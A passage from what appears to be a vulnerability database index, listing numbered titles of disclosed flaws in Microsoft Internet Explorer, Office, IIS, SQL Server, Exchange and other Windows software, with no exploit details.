Tag Race Condition DoS [32626] Microsoft IE Crafted res:// Forced 404 Page Reporting [32625] Microsoft IE res://ieframe.dll/invalidcert.htm Site Security Certificate Discrediting [32624] Microsoft IE mhtml Overflow DoS [32119] Microsoft IE Cross Domain Charset Inheritance Weakness [32087] Microsoft IE onunload Event Address Bar Spoofing [31901] Microsoft Office Unspecified String Handling Arbitrary Code Execution [31900] Microsoft Word Unspecified Memory Corruption Arbitrary Code Execution (929434) [31899] Microsoft Help Workshop HPJ File OPTIONS Section Overflow [31898] Microsoft Help Workshop Crafted .cnt File Handling Overflow [31896] Microsoft Project Server pdsrequest.asp GetInitializationData Request SQL Database Password Disclosure [31895] Microsoft IE Blnmgrps.dll COM Object Instantiation Memory Corruption [31894] Microsoft IE Htmlmm.ocx COM Object Instantiation Memory Corruption [31893] Microsoft IE Msb1fren.dll COM Object Instantiation Memory Corruption [31892] Microsoft IE FTP Server Response Parsing Memory Corruption [31891] Microsoft IE Imjpcksid.dll COM Object Instantiation Memory Corruption [31888] Microsoft Malware Protection Engine PDF File Parsing Remote Code Execution [31887] Microsoft MFC Component RTF OLE Object Memory Corruption Remote Code Execution [31886] Microsoft RichEdit OLE Dialog RTF Memory Corruption Remote Code Execution [31883] Microsoft Step-by-Step Interactive Training Bookmark Handling Remote Code Execution [31882] Microsoft MDAC ADODB.Connection ActiveX Control Execute Method Remote Code Execution [31805] XEROX WorkCentre Products Web User Interface Microsoft Networking Configuration Command Injection [31799] Windows Firewall ADS Application Alert Failure [31779] Windows Firewall .exe Incorrect Application Block Alerts [31647] Microsoft IE Javascript IsComponentInstalled Overflow [31607] Microsoft Visual Studio 1 TYPELIB MOVEABLE PURE .rc File Name Overflow [31345] Mozilla Multiple Products on Windows CSS Cursor Image Overflow [31333] Microsoft IE Image File Embedded Content XSS [31332] Microsoft IE Scrollbar CSS Property DoS [31331] Microsoft IE mailto: Handler Arbitrary Command-Line Argument Modification [31330] Microsoft IE File:// URI src Tag IFrame DoS [31329] Microsoft IE DNS Pinning Intranet Server Arbitrary Javascript Execution [31328] Microsoft IE UTF-7 Encoded HTTP 404 Error Message XSS [31326] Microsoft IE HTML Table Tag style Attribute DoS [31325] Microsoft IE HTML Frame Tag Invalid src Attribute DoS [31324] Microsoft IE DirectAnimation ActiveX Multiple Unspecified [31323] Microsoft IE DIV Tag and HTML CSS Float Properties Arbitrary Code Execution [31322] Microsoft IE SSL Certificate Chain Validation MiTM Weakness [31321] Microsoft IE Javascript self.location Refresh DoS [31258] Microsoft Excel Palette Record Handling Overflow [31257] Microsoft Excel Column Record Heap Corruption Remote Code Execution [31256] Microsoft Excel Malformed String Handling Remote Code Execution [31255] Microsoft Excel IMDATA Record Handling Remote Code Execution [31254] Microsoft Outlook Advanced Find .oss File Handling Remote Code Execution [31253] Microsoft Outlook E-mail Header Processing Unspecified DoS [31252] Microsoft Outlook VEVENT Record Handling Remote Code Execution [31251] Microsoft Office 2003 Brazilian Portuguese Grammar Checker Arbitrary Code Execution [31250] Microsoft IE Vector Markup Language (VML) Remote Overflow [31249] Microsoft Excel Malformed Record Memory Access Code Execution [31243] Windows NT FTP Server (WFTP) Pro Server APPE Command Overflow [30834] Microsoft IE URLMON.DLL Long URL HTTP Redirect Overflow [30826] Microsoft Visual Basic Click Event Procedure Overflow [30825] Microsoft Word Malformed Data Structure Handling Memory Corruption [30824] Microsoft Word Malformed String Memory Corruption [30822] Microsoft IE A Tag Long Title Attribute DoS [30820] Microsoft Word mso.dll / mso9.dll LsCreateLine Function DoS [30816] Microsoft IE TIF Folder Cached Content Information Disclosure [30815] Microsoft IE TIF Folder Drag and Drop Operation Information Disclosure [30814] Microsoft IE DHTML Script Function Memory Corruption [30813] Microsoft IE Script Error Handling Memory Corruption [30402] Microsoft w3wp Crafted COM Component Request DoS [30208] Microsoft XMLHTTP ActiveX Control setRequestHeader Method Arbitrary Code Execution [30155] Microsoft Visual Studio WMI Object Broker ActiveX (WmiScriptUtils.dll) Unspecified Code Execution [30087] Microsoft IE Empty APPLET Tag DoS [30022] Microsoft IE Non-breaking Spaces Popup Address Bar Spoofing [29724] Microsoft Hyperlink Object Library (hlink.dll) Crafted Hyperlink Arbitrary Code Execution [29720] Microsoft PowerPoint Unspecified Code Execution [29525] Microsoft IE dxtmsft3.dll Multiple ActiveX COM Object DoS [29524] Microsoft IE dxtmsft.dll Multiple ActiveX COM Object DoS [29514] AK-Systems Windows Terminal VNC Server Default Null Password [29512] Windows NT FTP Server (WFTP) Multiple Command Remote Overflow [29501] Microsoft Visual Studio Multiple ActiveX COM Object Remote Memory Corruption [29448] Microsoft PowerPoint Crafted File Unspecified Code Execution [29447] Microsoft PowerPoint Crafted PPT Data Record Code Execution [29446] Microsoft PowerPoint Crafted PPT Object Pointer Code Execution [29445] Microsoft Excel Crafted XLS COLINFO Record Arbitrary Code Execution [29444] Microsoft Excel Crafted Lotus 1-2-3 File Arbitrary Code Execution [29443] Microsoft Excel Crafted XLS DATETIME Record Arbitrary Code Execution [29442] Microsoft Word for Mac Crafted String Unspecified Code Execution [29441] Microsoft Word Crafted Mail Merge File Arbitrary Code Execution [29440] Microsoft Word memmove Integer Overflow [29431] Microsoft .NET Framework AutoPostBack Property Unspecified XSS [29430] Microsoft Office Malformed Smart Tag Arbitrary Code Execution [29429] Microsoft Office mso.dll Malformed Record Handling Arbitrary Code Execution [29428] Microsoft Office Malformed Chart Record Unspecified Arbitrary Code Execution [29427] Microsoft Office Crafted String Unspecified Arbitrary Code Execution [29426] Microsoft XML Core Services XSLT Processing Overflow [29425] Microsoft XML Core Services XMLHTTP ActiveX Control Server-side Redirect Information Disclosure [29412] Microsoft Terminal Server Explorer Error Arbitrary Code Execution [29347] Microsoft IE msoe.dll COM Object Instantiation Code Execution [29346] Microsoft IE chtskdic.dll COM Object Instantiation Code Execution [29345] Microsoft IE imskdic.dll COM Object Instantiation Code Execution [29259] Microsoft PowerPoint PPT Unspecified Arbitrary Code Execution [29143] Microsoft PowerPoint PPT Malformed BIFF File Arbitrary Command Execution [29129] Microsoft IE wininet.dll Content-Type DoS [28946] Microsoft IE Vector Markup Language (VML) Arbitrary Code Execution [28842] Microsoft IE daxctle.ocx KeyFrame() Method Overflow [28841] Microsoft IE daxctle.ocx Spline Function Call Overflow [28730] Microsoft Publisher PUB File Font Parsing Overflow [28726] Microsoft Works Malformed Lotus 1-2-3 Spreadsheet DoS [28725] Microsoft Works Malformed Excel Spreadsheet DoS [28724] Microsoft Works Malformed Excel Spreadsheet Overflow [28723] Microsoft Works Malformed Works Spreadsheet DoS [28627] Microsoft IE VBScript and Javascript Infinite Loop Stack Overflow [28614] Microsoft IE input/div Tag width Conflict DoS [28539] Microsoft Word 2000 Unspecified Code Execution [28538] Microsoft Excel Cell Comment Rebuild Arbitrary Code Execution [28537] Microsoft Excel Crafted SELECTION Record Arbitrary Code Execution [28536] Microsoft Excel SELECTION Record Memory Corruption Arbitrary Code Execution [28535] Microsoft Excel Crafted COLINFO Record Arbitrary Code Execution [28534] Microsoft Excel Crafted LABEL Record Arbitrary Code Execution [28533] Microsoft Excel Crafted FNGROUPCOUNT Value Arbitrary Code Execution [28532] Microsoft Excel Crafted BIFF Record Array Index Arbitrary Code Execution [28381] Microsoft IE ActiveX SaveFile Handling DoS [28376] Microsoft IE US-ASCII Character Set Filter Bypass XSS [28260] Microsoft IIS FrontPage Server Extensions (FPSE) shtml.exe Path Disclosure [28134] Windows NT FTP Server (WFTP) Server SIZE Command Remote Overflow [28132] Microsoft IE HTTP 1.1 URL Parsing Overflow [27922] Microsoft Virtual DOS Machine (VDM) Local Memory Disclosure [27913] Apache HTTP Server on Windows mod_alias URL Validation Canonicalization CGI Source Disclosure [27855] Microsoft IE document.getElementByID Crafted CSS Arbitrary Code Execution [27854] Microsoft IE Chained CSS Imports Memory Corruption [27853] Microsoft IE HTML Rendering Memory Corruption [27852] Microsoft IE Uninitialized COM Object Memory Corruption [27851] Microsoft IE Redirect Handling Cross-Domain Privilege Escalation [27850] Microsoft IE Cross Site Window Location Information Disclosure [27849] Microsoft Visual Basic Unspecified Document Handling Overflow [27842] Microsoft Management Console (MMC) HTML-embedded Resource XSS Arbitrary Command Execution [27685] IBM Informix Dynamic Server on Windows username Overflow [27533] Microsoft IE Orphan Object Property Access NULL Dereference [27532] Microsoft IE ADODB.Recordset SysFreeString Invalid Length [27530] Microsoft IE NDFXArtEffects Multiple Property Overflow [27507] Microsoft Excel Embedded Shockwave Flash Object Arbitrary Javascript Execution [27475] Microsoft IE Nested Objects Exception Handler Unspecified Memory Corruption [27373] Microsoft IE Native Function Iteration NULL Dereference [27372] Microsoft IE Forms Multiple Object ListWidth Property Overflow [27327] Microsoft PowerPoint PPT File Closure Memory Corruption [27326] Microsoft PowerPoint powerpnt.exe Unspecified Issue [27325] Microsoft PowerPoint mso.dll PPT Processing Unspecified Code Execution [27324] Microsoft PowerPoint mso.dll PPT Processing Arbitrary Code Execution [27232] Microsoft IE NMSA.ASFSourceMediaDescription dispValue Overflow [27231] Microsoft IE HTML Help COM Object Click Method NULL Dereference [27230] Microsoft IE CEnroll SysAllocStringLen Invalid Length [27153] Microsoft .NET Framework Crafted Request Access Restriction Bypass [27150] Microsoft Office MSO.DLL String Processing Overflow [27149] Microsoft Office Malformed Property Overflow Arbitrary Code Execution [27148] Microsoft Office File Processing Malformed String Arbitrary Code Execution [27147] Microsoft Office PNG Processing Unspecified Code Execution [27146] Microsoft Office GIFIMP32.FLT GIF Parsing Overflow [27112] Microsoft IE OVCtl NewDefaultItem Method NULL Dereference [27111] Microsoft IE OWC11.DataSourceControl getDataMemberName Method Overflow [27110] Microsoft IE WebViewFolderIcon setSlice Overflow [27109] Microsoft IE DXImageTransform.Microsoft.Gradient Multiple Property Overflow [27108] Microsoft IE MHTMLFile Multiple Property NULL Dereference [27087] Microsoft IIS SMTP Encapsulated SMTP Address Open Relay [27059] Microsoft IE FolderItem Object NULL Dereference [27057] Microsoft IE DXImageTransform.Microsoft.RevealTrans Transition Property NULL Dereference [27056] Microsoft IE TriEditDocument URL Property NULL Dereference [27055] Microsoft IE HtmlDlgSafeHelper fonts Property NULL Dereference [27053] Microsoft Excel Asian Language Style Option Overflow [27014] Microsoft IE Object.Microsoft.DXTFilter Enabled Property NULL Dereference [27013] Microsoft IE DirectAnimation.DAUserData Data Property NULL Dereference [26957] Microsoft IE File Share Traversal Arbitrary HTA Execution [26956] Microsoft IE object.documentElement.outerHTML Cross-site Information Disclosure [26955] Microsoft IE RDS.DataControl SysAllocStringLen Invalid Length Issue [26921] Novell GroupWise Windows Client Arbitrary Email Access [26839] Microsoft IE DirectAnimation.StructuredGraphicsControl SourceURL NULL Dereference [26837] Microsoft IE Frameset inside Table NULL Dereference [26836] Microsoft IE OutlookExpress.AddressBook COM Object NULL Dereference [26835] Microsoft IE HTML Help COM Object Image Property Heap Overflow [26834] Microsoft IE ADODB.Recordset COM Object Filter Property NULL Dereference [26771] Webmin on Windows Crafted Backslash Request Traversal Arbitrary File Access [26686] Toshiba Bluetooth Stack for Windows TOSRFBD.SYS Remote Overflow DoS [26666] Microsoft Hyperlink Object Library hlink.dll Link Processing Overflow [26536] Adobe Reader for Windows Multiple Unspecified Issues [26527] Microsoft Excel Malformed URL String Handling Overflow [26446] Microsoft IE Multipart HTML File Save Memory Corruption [26445] Microsoft IE Modal Browser Window Address Bar Spoofing [26444] Microsoft IE DXImageTransform.Microsoft.Light ActiveX Arbitrary Code Execution [26443] Microsoft IE UTF-8 Encoded HTML Overflow [26442] Microsoft IE Wmm2fxa.dll DXImageTransform COM Object Memory Corruption [26441] Microsoft Exchange Server Outlook Web Access HTML Parsing Unspecified XSS [26435] Microsoft PowerPoint Malformed Record Arbitrary Code Execution [26434] Microsoft JScript Object Release Memory Corruption [26193] Microsoft NetMeeting Unspecified Remote DoS [26175] Microsoft Jet SQL Command Overflow NULL Dereference DoS [25635] Microsoft Word Unspecified Code Execution [25429] Novell Client for Windows DPRPC library (DPRPCW32.DLL) ndps_xdr_array Function Remote Overflow [25400] IBM WebSphere Application Server (WAS) on Windows Registry Cleartext Credential Disclosure [25338] Microsoft Exchange Collaboration Data Objects Crafted Email Code Execution [25073] Microsoft IE mhtml: Redirection Domain Restriction Bypass [25003] Microsoft Office mailto: Arbitrary File Access [24966] Microsoft IE object Tag Memory Corruption Arbitrary Code Execution [24918] Ethereal NetXray/Windows Sniffer File Code Overflow [24595] Microsoft Office Malformed BIFF Record Multiple File Format Processing DoS [24547] Microsoft IE HTML Parsing Unspecified Remote Code Execution [24546] Microsoft IE COM Object Instantiation Remote Code Execution [24545] Microsoft IE HTML Element Crafted Tag Arbitrary Code Execution [24544] Microsoft IE IOleClientSite Dynamic Object Script Execution [24543] Microsoft IE Navigation Method Cross-Domain Information Disclosure [24542] Microsoft IE Unspecified Address Bar Spoofing [24541] Microsoft IE Double Byte Character Set (DBCS) Parsing Overflow [24518] Microsoft FrontPage Server Extensions fpadmdll.dll Multiple Parameter XSS [24517] Microsoft Data Access Components RDS.Dataspace ActiveX Remote Code Execution [24490] Microsoft IE w/ Sun Java VM INPUT Focus DoS [24465] Microsoft IE Window Loading Race Condition Address Bar Spoofing [24318] Microsoft Fingerprint Reader Cleartext Credential Transmission [24208] Microsoft .NET Framework ILDASM Overflow [24207] Microsoft .NET Framework ILASM .il File Processing Overflow [24121] Microsoft Commerce Server 2002 authfiles/login.asp Authentication Bypass [24095] Microsoft IE Arbitrary HTA File Execution [24081] Microsoft Outlook 2003 Unspecified Malformed Word Attachment DoS [24050] Microsoft IE createTextRange() Function Arbitrary Code Execution [23964] Microsoft IE mshtml.dll Multiple Script Action Handler Overflow [23903] Microsoft Office Crafted Routing Slip Arbitrary Code Execution [23902] Microsoft Office Excel Malformed Record Arbitrary Code Execution [23901] Microsoft Office Excel Malformed Graphic Arbitrary Code Execution [23900] Microsoft Office Excel Malformed Description Arbitrary Code Execution [23899] Microsoft Office Excel BIFF File Processing Malformed BOOLERR Record Arbitrary Code Execution [23711] Microsoft Visual Studio .dbp File DataProject Field Buffer Overflow [23657] Microsoft IE ActiveX Killbit Setting Bypass [23609] Microsoft IE Crafted Elements Status Bar URL Spoofing [23608] Microsoft IE Iframe Folder Delete Weakness [23591] Microsoft Office Spreadsheet Component SaveAs Capability Arbitrary File Creation [23590] Microsoft IIS Traversal Arbitrary FPSE File Access [23588] Microsoft IE Self-referenced OBJECT Directive DoS [23572] M4 Project enigma-suite Windows Client Default Account [23569] HP System Management Homepage (SMH) on Windows Unspecified Traversal Arbitrary File Access [23542] lighttpd on Windows Crafted Filename Request Script Source Disclosure [23490] Microsoft IE Scripting Engine Thread Stack Exhaustion DoS [23484] Microsoft SQLServer 2000 sp_addalias Procedure Privileged Alias Creation [23307] Microsoft IE window.status Memory Leak DoS [23234] Microsoft SQLServer 2000 Unspecified Invalid Client Buffer DoS [23231] Microsoft SQL Server 2000 SQL Profiler Multiple Method DoS [23228] Microsoft Outlook Web Access .INC File Direct Request Source Disclosure [23205] Microsoft SQLServer 2000 Crafted Sort Command User Mode Scheduler (UMS) Bypass DoS [23203] Microsoft SQL Server 2000 Database Name Transact-SQL Statement Privilege Escalation [23202] Microsoft SQLServer 2000 sysmembers Virtual Table Query Overflow [23201] Microsoft SQL Server 2000 Dynamic Transact-SQL Statement Disclosure [23200] Microsoft SQLServer 2000 Encrypted Stored Procedure Dynamic Query Disclosure [23135] Microsoft PowerPoint Temporary Internet Files Information Disclosure [22977] Microsoft IE jscript.dll document.write() NULL Pointer DoS [22976] Microsoft IE Crafted WMF Header Size Arbitrary Code Execution [22948] Microsoft IE urlmon.dll BGSOUND Tag file Attribute Overflow DoS [22941] Microsoft HTML Help Workshop .hhp Parsing Overflow [22834] Microsoft Log Sink Class pkmcore.dll ActiveX Arbitrary File Manipulation [22824] Microsoft Excel xls Processing Malformed Page Size Name Null Dereference [22823] Microsoft Excel xls Processing Malformed Graphic Pointer NULL Pointer Dereference [22649] ELOG on Windows Entry Resubmission Overflow [22364] WinRAR for Windows Archive Filename Overflow [22356] Microsoft IE Unspecified NULL Dereference DoS (#2) [22355] Microsoft IE Unspecified NULL Dereference DoS (#1) [22354] Microsoft IE Malformed table datasrc Tag DoS [22351] Microsoft IE Modal Security Dialog Race Condition [22332] Microsoft Visual Studio UserControl Load Event Code Execution [22305] Microsoft Outlook/Exchange TNEF Decoding Arbitrary Code Execution [21907] Microsoft Office InfoPath 2003 Mshtml.dll Form Handling DoS [21805] Microsoft IIS Crafted URL Remote DoS [21763] Microsoft IE Embedded CLSID COM Object Arbitrary Code Execution [21762] Microsoft IE HTTPS Proxy Basic Authentication URL Cleartext Transmission [21761] Microsoft IE Keyboard Shortcut Processing Weakness [21760] Microsoft IE Suppressed Download Dialog Window Manipulation Weakness [21568] Microsoft Excel xls Processing msvcrt.memmove() Function Malformed Range Overflow [21562] Microsoft IE CSS Crafted p Element DoS [21537] Microsoft IIS Log File Permission Weakness Remote Modification [21532] Microsoft IE CSS @import Directive Cross Domain Information Disclosure [20886] Microsoft IE Unspecified Margin/Padding NULL Pointer Dereference DoS [20874] Microsoft IE clipboardData Object getData Method Content Disclosure [20500] Microsoft IE Restricted Zone Site Addition URI DoS [20464] GO-Global for Windows _USERSA_ Remote Overflow [20376] Microsoft IE with JRE mshtmled.dll Malformed frameset Tag DoS [20308] Skype for Windows Crafted VCARD Handling Overflow [20307] Skype for Windows Crafted callto/skype URL Overflow [20271] Microsoft IE settimeout Function Recursion DoS [20248] Microsoft IE Embedded Content Processing XSS [20241] Microsoft ISA Server Fragmented UDP Saturation DoS [20207] Microsoft IE Alphanumeric Password Character Recognition Issue [20199] Microsoft IE Image Saturation Handling DoS [20146] Microsoft IE PerfectNav Plugin Malformed URL DoS [20106] BEA WebLogic on Windows Registry Cleartext Password Disclosure [19905] Microsoft Collaboration Data Objects Remote Overflow [19876] Microsoft AntiSpyware Registry Extension Bypass [19806] Microsoft IE Crafted Double Backslash shell: URI DoS [19798] Microsoft IE for Mac Malformed BGSOUND Tag DoS [19796] Microsoft IE Malformed IFRAME File Source DoS [19662] Microsoft IE XMLHTTP HTTP Request Injection [19267] WRQ Reflection for Secure IT Windows Server Mixed Case Ruleset Bypass [19266] WRQ Reflection for Secure IT Windows Server Default Account Persistence [19265] WRQ Reflection for Secure IT Windows Server Host Private Key File Permission Weakness [19264] Microsoft Exchange Server 2003 Crafted IMAP4 Folder Listing Request DoS [19209] Rediff Bol Fetch.FetchContact.1 ActiveX Windows Address Book Disclosure [19093] Microsoft Design Tools msdds.dll COM Object Arbitrary Code Execution [19089] Microsoft IE Unspecified Remote Code Execution [19029] Microsoft IE Meta Refresh Parsing Weakness [19024] Microsoft IE Automatic MIME Detection Weakness [18926] Microsoft IIS SERVER_NAME Variable Spoofing Filter Bypass [18897] MySQL on Windows UDF Create Function Traversal Privilege Escalation [18822] Microsoft DirectX DirectShow QUARTZ.DLL AVI Processing Overflow [18703] Novell eDirectory iMonitor on Windows dhost.exe Unspecified Remote Overflow [18612] Microsoft IE Multiple COM Object Embedded CLSID Arbitrary Remote Code Execution [18611] Microsoft IE Web Folder Cross-Domain Code Execution [18610] Microsoft IE JPEG Rendering Memory Corruption Arbitrary Code Execution [18587] Gaim for Windows accounts.xml Cleartext Password Local Disclosure [18510] Microsoft IE AJAX Crafted Content-type Header DoS [18501] CA BrightStor ARCserve Backup Agent for Windows Long String Overflow [18484] Mozilla Firefox with Microsoft Office Shared Section Permission Weakness Information Disclosure [18461] Microsoft ActiveSync Client/Server Partnership ID Spoofing [18460] Microsoft ActiveSync Authentication Transmission Cleartext Disclosure [18459] Microsoft ActiveSync Sync Request Saturation DoS [18458] Microsoft ActiveSync Device Response Equipment ID Enumeration [18243] Microsoft Outlook MS-DOS Device Name Attachment DoS [18241] Microsoft Outlook Express begin Keyword Message Handling DoS [18173] MySQL on Windows USE Command MS-DOS Device Name DoS [18152] Microsoft IE Image File Handling Remote DoS [17944] Windows XP OEM Backdoor Administrator Account [17893] Microsoft ASP.NET RPC/encoded Mode Malformed SOAP Message DoS [17829] Microsoft Office .doc Font Parsing Overflow [17707] Microsoft Front Page Malformed HTML Edit DoS [17680] Microsoft IE JVIEW javaprxy.dll Memory Manipulation Arbitrary Code Execution [17671] Microsoft Site Server viewcode.asp Information Disclosure [17670] Microsoft Site Server Multiple Sample Sites SQL Injection [17669] Microsoft Site Server cphost.dll Arbitrary Code Execution [17668] Microsoft Site Server cphost.dll Malformed File Upload Disk Consumption DoS [17667] Microsoft Site Server LDAP_Anonymous Account Cleartext Password Disclosure [17666] Microsoft Site Server formslogin.asp url Parameter XSS [17665] Microsoft Site Server Default.asp XSS [17664] Microsoft Site Server remind.asp Information Disclosure [17663] Microsoft Site Server auoconfig.asp Information Disclosure [17662] Microsoft Site Server VsPrAuoEd.asp Information Disclosure [17661] Microsoft Site Server VsLsLpRd.asp Information Disclosure [17660] Microsoft Site Server VsTmPr.asp Information Disclosure [17659] Microsoft Site Server vs.asp Information Disclosure [17658] Microsoft Site Server default.asp Information Disclosure [17657] Microsoft Site Server UserManager.asp Arbitrary LDAP Modification [17656] Microsoft Site Server GroupManager.asp Arbitrary LDAP Modification [17655] Microsoft Site Server DSN.asp Information Disclosure [17654] Microsoft Site Server driver.asp Information Disclosure [17653] Microsoft Site Server domain.asp Information Disclosure [17652] Microsoft Site Server findserver.asp Information Disclosure [17624] VERITAS Backup Exec Remote Agent for Windows CONNECT_CLIENT_AUTH Remote Overflow [17622] VERITAS Backup Exec for Windows Admin Plus Pack Option Remote Overflow [17389] Microsoft Outlook Crafted E-mail Subject Arbitrary System File Creation [17342] Microsoft ISA Server Basic Credentials Exposure [17334] Microsoft IE Script Code Obfuscation (Ghost) [17314] Microsoft IE XML Redirect Information Disclosure [17313] Microsoft IE PNG Image Processing Arbitrary Code Execution [17312] Microsoft ISA Server NetBIOS Predefined Filter Privilege Escalation [17311] Microsoft ISA Server Cache Poisoning Restriction Bypass [17310] Microsoft Agent Trusted Internet Content Spoofing (fireclicking) [17307] Microsoft Exchange Outlook Web Access HTML Email XSS [17306] Microsoft Outlook Express NNTP LIST Command Remote Overflow [17218] Microsoft IE Stack Overflow Saturation DoS [17217] Microsoft IE Embedded File Recursion DoS [17176] Microsoft IE msxml3.dll Malformed Ref href Link DoS [17159] Microsoft IE Malformed FTP URL DoS [17158] Microsoft IE Crafted BMP Size Setting DoS [17124] Microsoft IIS Malformed WebDAV Request DoS [17123] Microsoft IIS Multiple Unspecified Admin Pages XSS [17122] Microsoft IIS Permission Weakness .COM File Upload [17094] Microsoft IE window() Function Arbitrary Code Execution [17088] Microsoft AntiSpyware gsasDtServ.exe Path Subversion Privilege Escalation [17045] SunOS Openwindows psh xnews Privilege Escalation [17031] Microsoft ISA Server 2000 SecureNAT Traffic Saturation DoS [16895] IRIX ftpd Unspecified Windows Link DoS [16827] Microsoft WGA Multiple Method Validation Bypass [16814] Microsoft Word mcw File Processing Overflow [16813] Microsoft ASP.NET FileStream Method Nonexistent File Request Path Disclosure [16729] avast! Anti-Virus on Windows NT Unspecified Scanner Bypass [16342] Microsoft IE Cross Site Mouse Click Disclosure [16196] Microsoft ASP.NET __VIEWSTATE Functionality Replay Attack [16195] Microsoft ASP.NET __VIEWSTATE Functionality Nested Request DoS [16024] AbsoluteTelnet Windows Title Remote Overflow [15979] OpenWindows Mailtool Malformed Mail Attachment DoS [15879] APG Classmaster Workstation Windows SMB Share Access Restriction Bypass [15757] Microsoft SQL Server sa Account Default Null Password [15749] Microsoft IIS / Site Server code.asp Arbitrary File Access [15480] Microsoft Outlook From Header Comma Parsing Failure [15479] Microsoft XP SP1 explorer.exe Malformed GIF Processing DoS [15470] Microsoft Word Unspecified Overflow [15467] Microsoft Exchange Server SMTP Extended Verb X-LINK2STATE Remote Overflow [15466] Microsoft IE Content Advisor Overflow [15465] Microsoft IE DHTML Object Memory Corruption Code Execution [15464] Microsoft IE wininet.dll Long Hostname Heap Corruption Code Execution [15342] Microsoft IIS Persistent FTP Banner Information Disclosure [15329] Microsoft IE Malformed RSA Public Key SSL Detection Failure [15224] Microsoft IE External Caching Security Failure Arbitrary File Access [15223] Microsoft IE XHTML Formatted Comment User Confirmation Bypass [15222] Microsoft IE imagetoolbar Functionality Disable Pop Up Dereference DoS [15221] Microsoft IE Drag and Drop Zone Security Preference Bypass [15220] Microsoft IE showHelp() Function Cross Domain Code Execution [15219] Microsoft IE XML Object Arbitrary File Access [15218] Microsoft IE showHelp() Function Double Backslash Arbitrary .chm Execution [15217] Microsoft IE input Tag Rendering DoS [15216] Microsoft IE Dialog Box Cross Domain Arbitrary Program Execution [15187] Microsoft Jet Database msjet40.dll File Parsing Overflow [15110] Microsoft Outlook Connector for Lotus Domino Password Policy Bypass [14882] Microsoft Office InfoPath Manifest.xsf Information Disclosure [14801] Eudora 'Use Microsoft Viewer' Option IE Launch Arbitrary Code Execution [14793] Microsoft IE window.showHelp() HTML Help File Arbitrary Command Execution [14765] Windows NT FTP Server (WFTP) Pro Server MKD/XMKD Absolute Path DoS [14764] Windows NT FTP Server (WFTP) Pro Server Unterminated Long Command DoS [14763] Windows NT FTP Server (WFTP) Pro Server Multiple Command Local Overflow [14762] Windows NT FTP Server (WFTP) STAT Command File Transfer Path Disclosure [14761] Windows NT FTP Server (WFTP) REST Command Malformed File Write Handling Remote DoS [14663] Microsoft AntiSpyware cscript/wscript Filter Bypass [14617] Microsoft Exchange Server 2003 Folder Handling DoS [14509] Microsoft Services for Unix Malformed RPC Client Fragment Packet DoS [14502] Microsoft Data Access Components RDS Data Stub Remote Overflow [14497] Microsoft Services for Unix RPC Library Malformed Packet Fragment DoS [14478] Worldspan for Windows Gateway Res Manager Port 17990 Malformed Request DoS [14446] Microsoft Virtual Machine Java Applet Invalid Handle DoS [14445] Microsoft Virtual Machine XML Support Classes Inappropriate Methods [14430] Microsoft Commerce Server 2000 Profile Service Affected API Overflow [14396] Microsoft ISA DNS Intrusion Detection Filter DoS [14269] Windows NT FTP Server (WFTP) .lnk Traversal Arbitrary File Access [14229] Microsoft IIS asp.dll Scripting.FileSystemObject Malformed Program DoS [14150] Windows NT Inappropriate Registry Key Permissions [14149] Windows NT Inappropriate Registry Key Value [14068] Smarty Windows Installation File Permission Issue [14025] Microsoft IE Script Initiated Popup Title Bar Spoofing [13985] Microsoft IIS Malformed HTTP Request Log Entry Spoofing [13945] Windows NT FTP Server (WFTP) Floppy Drive CD Request DoS [13928] Microsoft ASP.NET HttpServerUtility.HtmlEncode Unicode Character Bypass [13927] Microsoft ASP.NET Request Validation Mechanism Bypass [13859] Windows NT FTP Server (WFTP) Pro Long CWD Command Remote Overflow [13857] Windows NT Drivers DbgPrint Function Debug Message Format String [13762] Microsoft 2000 Domain Controller Directory Service Restore Mode Blank Password [13761] Microsoft Exchange 2000 Malformed URL Request DoS [13760] Microsoft IIS Malformed URL Request DoS [13759] Microsoft IIS ISAPI .ASP Parser Script Tag LANGUAGE Argument Overflow [13634] Microsoft IIS Inetinfo.exe Malformed Long Mail File Name DoS [13621] Microsoft Outlook Web Access (OWA) owalogon.asp Redirection Account Enumeration [13608] Microsoft IE Drag-and-Drop Privilege Escalation [13607] Microsoft IE CDF Cross-Domain Code Execution [13606] Microsoft IE createControlRange() Function Heap Corruption [13605] Microsoft IE URL Decoding Zone Spoofing Code Execution [13604] Microsoft IE Drag-and-Drop File Injection [13594] Microsoft Office XP URL Overflow [13558] Microsoft IIS SSL Request Resource Exhaustion DoS [13510] Microsoft Index Server AllowedPaths Registry Key Index Path Disclosure [13507] Microsoft IIS showfile.asp FileSystemObject Arbitrary File Access [13483] Microsoft Site Server AdSamples SITE.CSC Information Disclosure [13482] Microsoft Network Monitor (Netmon) Protocol Parsing Remote Overflow [13479] Microsoft IIS for Far East Parsed Page Source Disclosure [13478] Microsoft MS01-014 / MS01-016 Patch Memory Leak DoS [13473] Microsoft IIS on FAT Partition Local ASP Source Disclosure [13472] Microsoft Services for Unix Telnet Service Memory Consumption DoS [13471] Microsoft Services for Unix NFS Service Memory Consumption DoS [13439] Microsoft IIS HTTP Request Malformed Content-Length Parsing Remote DoS [13436] Microsoft Exchange LDAP Filter Exceptional BER Encoding DoS [13433] Microsoft IIS WebDAV MKCOL Method Location Server Header Internal IP Disclosure [13432] Microsoft IIS WebDAV WRITE Location Server Header Internal IP Disclosure [13431] Microsoft IIS WebDAV Malformed PROPFIND Request Internal IP Disclosure [13430] Microsoft IIS aexp4.htr Password Policy Bypass [13429] Microsoft IIS aexp3.htr Password Policy Bypass [13428] Microsoft IIS aexp2b.htr Password Policy Bypass [13427] Microsoft IIS aexp2.htr Password Policy Bypass [13426] Microsoft IIS NTLM Authentication Request Parsing Remote Information Disclosure [13425] Microsoft .NET orderdetails.aspx OrderID Parameter Arbitrary Order Access [13418] Microsoft Virtual Machine Applet Tag Malformed CODEBASE Arbitrary File Access [13417] Microsoft Virtual Machine COM Object Arbitrary Code Execution [13412] Microsoft Virtual Machine user.dir Property Information Disclosure [13406] Microsoft BizTalk Server BizTalkHTTPReceive.dll ISAPI Overflow [13385] Microsoft IIS WebDAV Long PROPFIND/SEARCH Request DoS [13333] Mozilla Thunderbird Microsoft IE Default Javascript Handler [13325] Microsoft Network Monitor (Netmon) HTTP Protocol Parser Overflow [13258] Microsoft IE Excel File Address Bar Spoofing [13238] Microsoft PowerPoint Action Settings Allows Invocation of Default Browser [13133] Microsoft IE iframe Tag Malformed file Attribute DoS [13132] Microsoft IE %20 URL Spoofing [13040] Microsoft IE Javascript Load Local File Path Disclosure [12937] Microsoft Office Encrypted Document RC4 Implementation Weakness [12918] Microsoft IE Dynamic IFRAME Tag XP SP2 File Download Security Bypass [12862] 